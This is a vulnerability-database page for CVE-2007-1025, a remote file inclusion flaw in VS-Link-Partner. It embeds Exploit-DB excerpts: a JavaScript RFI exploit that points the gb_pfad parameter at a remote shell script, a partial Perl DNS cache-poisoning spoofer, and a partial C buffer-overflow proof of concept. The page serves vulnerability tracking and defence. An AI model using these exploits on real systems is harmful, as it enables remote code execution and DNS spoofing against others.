CVE-2007-1025
published 2007-02-21CVE-2007-1025: PHP remote file inclusion vulnerability in inc/functions_inc.php in VS-Link-Partner 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.67%
83.9th percentile
PHP remote file inclusion vulnerability in inc/functions_inc.php in VS-Link-Partner 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the gb_pfad, or possibly script_pfad, parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| virtualsystem | vs-link-partner | <= 2.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
Exploit-DB
WebMod 0.48 - Content-Length Remote Buffer Overflow
exploitdb·2007-03-01
CVE-2007-1260 WebMod 0.48 - Content-Length Remote Buffer Overflow
WebMod 0.48 - Content-Length Remote Buffer Overflow
---
/*
* WebMod Stack Buffer Overflow
*
* by cybermind (Kevin Masterson)
* [email protected]
*
* WebMod v0.48 exploit PoC code
*
*/
#include
#include
#include
#define WIN32_LEAN_AND_MEAN
#include
#include
#pragma comment (lib, "ws2_32.lib")
/*
local variables in connectHandle():
char *input; 4
char buf[8192+1]; 8193
int i,j; 8
int connfd; 4
int myid; 4
threaddata_t *tdata; 4
httpquery_t query; 149036
char tmp[1025]; 1025
int rcv; 4
char clbuf[11]; 11
total: 158293
actual (due to padding): 158308
breakdown of types:
typedef struct s_var { 546
char name[33]; 33
char value[513]; 513
} var_s;
typedef struct s_httpquery { 149036
char method[11]; 11
char clientip[16]; 16
char url[257]; 257
char *get; 4
char *post; 4
char *cookies; 4
Exploit-DB
VS-Link-Partner 2.1 - 'script_pfad' Remote File Inclusion
exploitdb·2007-02-16
CVE-2007-1025 VS-Link-Partner 2.1 - 'script_pfad' Remote File Inclusion
VS-Link-Partner 2.1 - 'script_pfad' Remote File Inclusion
---
VS-Link-Partner
//'===============================================================================================
//'[Script Name: VS-Link-Partner
//'....
//'..
//'[[ERROR]]]---------------------------------------------------------
//# ajann,Turkey
//# ...
//Basic exploit,but any time : (
var path="/inc/"
var adres="/functions_inc.php?" //File name
var acik ="gb_pfad=" // Line x
var shell="http://www.ehcbinningen.ch/komutverivee.txt?" // Shell Script
function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}
rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready Target : )
rfi.submit(); // Form Submit
}
VS-Link-Partner
Target:[http://[target]/[scriptpath]
ajan
No writeups or analysis indexed.
http://osvdb.org/35132http://www.securityfocus.com/bid/22594http://www.vupen.com/english/advisories/2007/0651https://exchange.xforce.ibmcloud.com/vulnerabilities/32547https://www.exploit-db.com/exploits/3323http://osvdb.org/35132http://www.securityfocus.com/bid/22594http://www.vupen.com/english/advisories/2007/0651https://exchange.xforce.ibmcloud.com/vulnerabilities/32547https://www.exploit-db.com/exploits/3323
2007-02-21
Published